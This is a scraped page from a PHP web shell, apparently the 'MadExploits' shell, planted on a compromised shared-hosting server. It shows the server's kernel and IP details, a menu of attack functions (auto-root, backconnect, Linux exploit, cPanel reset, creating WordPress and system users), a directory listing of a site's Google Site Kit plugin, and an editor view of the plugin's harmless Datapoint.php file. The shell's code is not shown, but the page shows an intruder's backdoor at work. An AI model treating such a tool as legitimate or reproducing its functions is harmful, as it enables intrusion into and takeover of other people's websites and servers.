Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.133.111.18
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Modules /
[ HOME SHELL ]
Name
Size
Permission
Action
Tags
[ DIR ]
drwxr-xr-x
Datapoint.php
2.23
KB
-rw-r--r--
Module.php
22.54
KB
-rw-r--r--
Module_Registry.php
1.61
KB
-rw-r--r--
Module_Settings.php
1.95
KB
-rw-r--r--
Module_Sharing_Settings.php
6.64
KB
-rw-r--r--
Module_With_Activation.php
569
B
-rw-r--r--
Module_With_Assets.php
944
B
-rw-r--r--
Module_With_Assets_Trait.php
1.74
KB
-rw-r--r--
Module_With_Data_Available_Sta...
1.01
KB
-rw-r--r--
Module_With_Data_Available_Sta...
1.51
KB
-rw-r--r--
Module_With_Deactivation.php
579
B
-rw-r--r--
Module_With_Debug_Fields.php
558
B
-rw-r--r--
Module_With_Owner.php
574
B
-rw-r--r--
Module_With_Owner_Trait.php
1.73
KB
-rw-r--r--
Module_With_Persistent_Registr...
645
B
-rw-r--r--
Module_With_Scopes.php
621
B
-rw-r--r--
Module_With_Scopes_Trait.php
722
B
-rw-r--r--
Module_With_Service_Entity.php
680
B
-rw-r--r--
Module_With_Settings.php
534
B
-rw-r--r--
Module_With_Settings_Trait.php
1008
B
-rw-r--r--
Module_With_Tag.php
671
B
-rw-r--r--
Module_With_Tag_Trait.php
1.65
KB
-rw-r--r--
Modules.php
25
KB
-rw-r--r--
REST_Dashboard_Sharing_Control...
3.55
KB
-rw-r--r--
REST_Modules_Controller.php
25.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Datapoint.php
<?php /** * Class Google\Site_Kit\Core\Modules\Datapoint * * @package Google\Site_Kit\Core\Modules * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Modules; /** * Class representing a datapoint definition. * * @since 1.77.0 * @access private * @ignore */ class Datapoint { /** * Service identifier. * * @since 1.77.0 * @var string */ private $service = ''; /** * Required scopes. * * @since 1.77.0 * @var string[] */ private $scopes = array(); /** * Shareable status. * * @since 1.77.0 * @var bool */ private $shareable; /** * Request scopes message. * * @since 1.77.0 * @var string */ private $request_scopes_message; /** * Constructor. * * @since 1.77.0 * * @param array $definition Definition fields. */ public function __construct( array $definition ) { $this->shareable = ! empty( $definition['shareable'] ); if ( isset( $definition['service'] ) && is_string( $definition['service'] ) ) { $this->service = $definition['service']; } if ( isset( $definition['scopes'] ) && is_array( $definition['scopes'] ) ) { $this->scopes = $definition['scopes']; } if ( isset( $definition['request_scopes_message'] ) && is_string( $definition['request_scopes_message'] ) ) { $this->request_scopes_message = $definition['request_scopes_message']; } } /** * Checks if the datapoint is shareable. * * @since 1.77.0 * * @return bool */ public function is_shareable() { return $this->shareable; } /** * Gets the service identifier. * * @since 1.77.0 * * @return string */ public function get_service() { return $this->service; } /** * Gets the list of required scopes. * * @since 1.77.0 * * @return string[] */ public function get_required_scopes() { return $this->scopes; } /** * Gets the request scopes message. * * @since 1.77.0 * * @return string */ public function get_request_scopes_message() { if ( $this->request_scopes_message ) { return $this->request_scopes_message; } return __( 'You’ll need to grant Site Kit permission to do this.', 'google-site-kit' ); } }
Close